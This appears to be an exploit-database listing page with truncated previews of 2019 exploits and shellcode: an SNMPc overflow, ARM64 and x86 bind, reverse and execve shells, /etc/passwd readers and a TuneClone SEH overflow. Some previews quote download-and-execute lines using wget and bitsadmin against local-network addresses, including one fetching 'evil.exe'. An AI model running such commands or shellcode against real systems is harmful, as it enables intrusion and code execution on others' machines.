SNMPc Enterprise Edition 9 / 10 Mapping Filename Buffer Overflow

!/usr/bin/python -- coding: utf-8 -- -------------------------------------------------------------------- Exploit: SNMPc Enterprise Edition 9 & 10 Mapping File Name BOF Date: 11 July 2019 Exploit Author: @xerubus | mogozobo.com Vendor Homepage: https://www.castlerock.com/ Software Linke:...

SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow Exploit

Exploit for windows platform in category local exploits !/usr/bin/python -- coding: utf-8 -- -------------------------------------------------------------------- Exploit: SNMPc Enterprise Edition 9 & 10 Mapping File Name BOF Date: 11 July 2019 Exploit Author: @xerubus | mogozobo.com Vendor...

Sodin ransomware exploits Windows vulnerability and processor architecture

When Sodin also known as Sodinokibi and REvil appeared in the first half of 2019, it immediately caught our attention for distributing itself through an Oracle Weblogic vulnerability and carrying out attacks on MSP providers. In a detailed analysis, we discovered that it also exploits the...

Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)

/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + Null-Free Shellcode 164 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...

Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes

/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...

Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)

/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + IPv6 Shellcode 176 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial...

Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)

/ Title: Linux/ARM64 - Reverse 127.0.0.1:4444/TCP Shell /bin/sh + Null-Free Shellcode 128 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...

Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)

/ Title: Linux/ARM64 - execve"/bin/sh", NULL, NULL Shellcode 40 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus...

Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)

/ ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique 21 bytes ;Author: kiriknik ;Date: 01/07/2019 ;Architecture: Linux x86 =========== Asm Source =========== global start section .text start: jmp short callshellcode shellcode: pop ebx xor eax,eax mov al, 11 i...

Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcod

/ Title: Linux/ARM64 - Egghunter PWN!PWN! + execve"/bin/sh", NULL, NULL + mprotect Shellcode 88 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...

Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)

/ Title: Linux/ARM64 - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 140 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...

Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)

/ Title: Linux/ARM64 - Read /etc/passwd Shellcode 120 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus development...

Linux/ARM64 - Jump Back Shellcode + execve(/bin/sh, NULL, NULL) Shellcode (8 Bytes)

/ Title: Linux/ARM64 - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 8 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...

Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)

/ Title: Linux/ARM64 - execve"/bin/sh", "/bin/sh", NULL Shellcode 48 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xer...

Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)

191 bytes small Windows/x86 start iexplore.exe shellcode. / Title: start iexplore.exe Author: Joseph McDonagh Shellcode length 191 Could be smaller if the app your are exploiting loads msvcrt. Purpose: Use the start command to open internet explorer and connect to a malicious web server The comma...

Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

Linux/x86 - ASCII AND, SUB, PUSH, POPAD Encoder Shellcode

!/usr/bin/env python3 INTRODUCTION Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD Date: 26.6.2019 Encoder Author: Petr Javorik, www.mmquant.net Tested on: Linux ubuntu 3.13.0-32-generic, x86 Special thx to: Corelanc0d3r for intro to this technique Description: This encoder is...

Tuneclone 2.20 - Local SEH Buffer Overflow

Tuneclone 2.20 - Local SEH Buffer Overflow Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python co...

Tuneclone 2.20 - Local SEH Buffer Overflow

Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python code : TuneClone.py 2.- Open EVIL.txt and cop...